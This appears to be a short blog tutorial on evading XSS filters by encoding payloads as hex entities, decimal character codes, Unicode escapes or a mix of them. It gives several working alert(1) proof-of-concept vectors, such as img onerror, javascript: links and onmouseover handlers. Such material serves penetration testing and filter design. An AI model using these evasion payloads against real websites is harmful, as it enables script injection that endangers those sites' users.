WHAT IS ENCODING?

It is the process of converting data from one form to another form using a scheme that is publicly available so that it can easily be reversed.

THE PROBLEM

Just in case you are able to inject your favorite payloads but your javascript functions/actions are being stripped or removed.

For example:

“><img src=x onerror=alert(1)> returned as “><img src=x onerror=(1)>

THE SOLUTION

You may try encoding it to Hex, ASCII code or Unicode entities.

Payload:

test <a href=jav&#x61scr&#x69pt:&#x61le&#x72t(1)>Click me</a> – HEX
HEX encoded XSS vector

test <img/src=x onerror=&#97le&#114t(1)> – ASCII  code
ASCII encoded XSS vector

test <h1/onmouseover='\u0061\u006c\u0065\u0072\u0074(1)'>hover over text – Unicode
UNICODE encoded XSS vector

You can mix up the encoding and it’ll still work.

test <h1/onmouseover='\u0061&#108e\u0072t(1)'>hover over text. – mixture of HEX, ASCII and Unicode

Useful Link/s:

https://www.branah.com/ascii-converter (remove 0 for HEX encoding e.g: “t” -> “0x74” -> “x74”)

https://www.branah.com/unicode-converter (ASCII codes are in Decimal representation)

Reference/s:
https://danielmiessler.com/study/encoding-encryption-hashing-obfuscation/

Tags:

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.